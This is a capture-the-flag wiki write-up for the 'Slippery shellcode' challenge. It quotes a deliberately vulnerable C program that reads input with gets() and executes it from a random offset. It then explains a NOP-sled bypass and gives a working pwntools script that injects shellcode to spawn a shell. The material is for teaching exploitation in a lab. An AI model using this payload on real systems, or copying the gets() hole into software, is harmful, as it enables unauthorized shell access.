Skip to content

Slippery shellcode

cheaterdxd edited this page Oct 13, 2019 · 1 revision

Question

This program is a little bit more tricky. Can you spawn a shell and use that to read the flag.txt? You can find the program in /problems/slippery-shellcode_1_69e5bb04445e336005697361e4c2deb0 on the shell server. Source.

Hint

No hint

Source code

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>

#define BUFSIZE 512
#define FLAGSIZE 128

void vuln(char *buf){
  gets(buf);
  puts(buf);
}

int main(int argc, char **argv){

  setvbuf(stdout, NULL, _IONBF, 0);
  
  // Set the gid to the effective gid
  // this prevents /bin/sh from dropping the privileges
  gid_t gid = getegid();
  setresgid(gid, gid, gid);

  char buf[BUFSIZE];

  puts("Enter your shellcode:");
  vuln(buf);

  puts("Thanks! Executing from a random location now...");

  int offset = (rand() % 256) + 1;
  
  ((void (*)())(buf+offset))();


  puts("Finishing Executing Shellcode. Exiting now...");
  
  return 0;
}

Solution

we know we must find a way to bypass the offset. You know that offset = rand( ) % 256 + 1, its mean, offset always smaller 257, so if we spawn 256 nop intructions + shellcode. it's always jump to nop. Then excute the shellcode.

Exploit

from pwn import *
s = process('./vuln')
shellcode = asm(shellcraft.i386.linux.sh())
payload = '\x90'*257+shellcode
s.sendline(payload)
s.interactive()
Clone this wiki locally